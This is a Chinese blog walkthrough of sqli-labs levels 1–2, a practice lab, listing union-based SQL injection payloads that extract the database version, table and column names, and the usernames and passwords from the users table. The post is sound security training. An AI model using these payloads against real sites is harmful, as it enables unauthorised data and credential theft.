sqli-labs第1-2关

最新推荐文章于 2022-11-05 11:09:08 发布
最新推荐文章于 2022-11-05 11:09:08 发布
阅读量131 收藏
点赞数
文章标签: mysql 数据库 sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42103643/article/details/119056828
版权

第一关

字符型注入,加单引号报错,需要闭合来注入
直接上语句:

?id=-1’ union select 1,2,concat_ws(char(32,58,32),user(),database(),version()) --+

concat_ws 可以无限查询,中间可以插入很多要查的东西,第一个是占位符,可以用~代替也行

id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+

0x7365637572697479这是hex加密的数据库名,不加密也行

group_concat() 多查询,把返回的很多数据全显示,返回所有表

-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+

加密的表名

’ union select 1,2,concat_ws(char(32,58,32),username,password) from users --+

查出数据,用group_concat()也行
-1’ union select 1,2,group_concat(id,username,password) from users–+

第二关

数字型,不用加单引号闭合了,感觉比第一关还简单
语句:

http://121.196.164.91:7001/Less-2/?id=111%20union%20select%201,2,concat_ws(%27~~%27,database(),user(),version())
查当然数据库,用户,数据库版本

111 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’
查当前数据库的表

http://121.196.164.91:7001/Less-2/?id=111%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27
查询当前表的字段

http://121.196.164.91:7001/Less-2/?id=111%20union%20select%201,2,concat_ws(%27~~%27,username,password)%20from%20users
查字段里的内容

前进四-maoge
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
通过sqli-labs学习sql注入——基础挑战之less1-3
北风
11-04 597
注:转载请注明出自:https://blog.csdn.net/qq_36711453/article/details/83713595 首先,先看一些基础知识吧!!!!本人只是初学者,记录一下自己的学习过程,有什么错误之处请指出,谢谢!大佬请绕过!!!! url编码:一般的url编码其实就是那个字符的ASCII值得十六进制,再在前面加个%。具体的编码对应请看w3school上的编码表:htt...
sqli-labs第一二(详细)
TA不懒,但还没有添加简介
09-01 452
sqli-labs第一(详细) *博主才接触这方面,若有任何建议请联系我,谢谢!* ![开始](https://img-blog.csdnimg.cn/930eca6eb2b84c22a90e520bab793337.png) localhost:8080/sqli-labs_2/sqlilabs/Less-1/?id=1 代码如下(示例): ......
新手纪录一下sqlilabs第二
weixin_52780973的博客
07-02 862
sqllib第二
sqli-labs----第二
wyzhxhn的博客
11-05 347
第二
SQL注入-宽字节注入(十一)(面试热点)
Gjqhs的博客
02-20 850
实验目的 普及宽字节注入的原理和应用场合,以及宽字节注入的基本方法和流程。 实验环境 攻击机:告诉桃花不用开了 (1)操作系统:Windows10 (2)安装的应用软件:sqlmap、Burpsuite、FireFox浏览器插件Hackbar、 FoxyProxy等 (3)登录账号密码:操作系统帐号Admin,密码asdfghjkl 靶机:键球 (1)操作系统:Centos7(本机亦可) (2)安装的应用软件:Apache、MySQL(MariaDB)、PHP:DVWA、SQLi-Labs、Webug
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs(php7.3以上可运行)
01-29
学习sql注入的开源平台
sql注入小结
攀登
10-20 486
  才学了sql注入没多久,就忘得干干净净了,也是佩服我自己。想学太多东西了,欲速则不达啊。还是老老实实记录些东西吧,学的时候得认真不然再回头看的时候真的是啥都不会。 常用语句 先来总结下做sqli-labs常用得语句吧。(以三个字段为例) 查基本信息:id=xx' union select 1,2,concat_ws(char(32,58,32),user(),database(),ver...
小白入坑第三步-了解sql注入
wyj_1216 House
02-02 526
任务来袭: 使用phpstudy、sqllibs搭建注入环境 学会sqlmap基本用法 熟练掌握联合查询的注入方法 学习笔记 使用phpstudy、sqllibs搭建注入环境 1、先准备相应的phpstudy、sqllibs sqli-labs: https://github.com/audi-1/sqli-labs phpstudy: https://jingyan.baidu.com/ar...
sqli-labs day1
weixin_30906701的博客
10-16 80
练习sql注入的 github:https://github.com/Audi-1/sqli-labs 为了方便调试,可以在每的index.php加上如下代码 echo "your sql statement is " . $sql . "<br>"; 预备知识: #的URL编码 %23 其他常见编码可以见 http://www.w3school.com.c...
通过DVWA学习SQL注入漏洞
热门推荐
Mi1k7ea
02-21 2万+
此篇文章作为本人的学习小笔记,有任何不足之处望各位大牛多多指教~ SQL注入漏洞作为OWASP TOP10中重要的一部分,可见其安全性的危害有多大。简单地说,SQL注入就是通过构建特殊的具有SQL语法的语句,绕到数据库中进而执行相应的操作的漏洞。SQL注入更多的描述就不再多说了,网上资料也很多,下面就直接上笔记。 基于报错的检测方法: 各种符号以及组合: ‘  “  (  %
Sqli-labs学习第一题
Recar的博客
12-06 1757
很多东西了解一下,然后去用,总会遇到问题,一定不能浅尝辄止,要深入学习下,不能说说,要及时复习,要经常用才不会忘。 一直用 sqlmap,很少手工注入,但是很多时候不是别人写的工具就能解决的,要自己的工具适应不同的场景,编写自己的工具,那么首先要手工流程很熟悉才可以。 决定实践一遍 sqli-lab,还有各大平台的CTF都来一遍。 实践是检验真理的唯一标准http://localhost:90
SQL宽字节注入
qq_64332865的博客
02-19 3327
宽字节注入适用于cms和数据库对字符串的编码方式不统一、WAF利用 AddSlashes()等函数对敏感字符进行转义的场景。 统一的国际规范的理想状态是所有应用程序都使用Unicode编码,所有的网站 都使用UTF-8编码。但因为一些历史原因,国内及国外(特别是非英语国家)的一些cms仍然使用着自己国家的一套编码(如GBK);也有一些cms为了考 虑老用户,出了GBK和 UTF-8两个版本。 一个GBK编码汉字,占用2个字节;一个UTF-8编码的汉字,占用3-4个字节。当Web应用程序的编码方式为GBK,而
Sqli-labs 复习 Less32-37 宽字节注入绕过过滤函数
kevinhanser
08-12 700
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 宽字节注入绕过过滤函数 过滤函数 addslashes() addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。 预定义字符是: 单引号(') 双引号(&quot;) 反斜杠(\) NULL 提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。 注释:默认地,P...
sql注入——宽字节注入
qq_33441500的博客
10-15 250
sql注入——宽字节注入 一,宽字节的由来 一个字符其大小为一个字节那么我们称其为窄字节 那么大小为两个字节的我们称其为宽字节 所有的英文默认占一个字节 那么中文汉字默认占两个字节 例如 gb2312,GBK,GB18030,BIG5,Shift_JIS这些编码都是宽字节 英文a-zA-Z共四十八种 一个字节都是八位的二进制 那么数字的0,1组合起来就有255...
SQL注入中常用的mysql语法
孤的博客
10-29 882
user()返回当前数据库连接使用的用户; database()返回当前数据库连接使用的数据库; version()返回当前数据库的版本; concat-ws() 函数可以将这些函数进行组合使用并显示出来。concat函数中,将其中的参数直接连接起来产生新的字符串。而在concat_ws函数中,第一个参数是用于作为分隔符将后面各个参数的内容分隔开来再进行相应的连接产生新的字符串。 concat_w...
sqli-labs第一详情解答
最新发布
09-14
1. 打开sqli-labs的网址,进入第一页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在跳转的页面中,我们可以看到URL中的参数"id"的值,比如:http://localhost/sqli-labs/Less-1/?id=1。我们需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值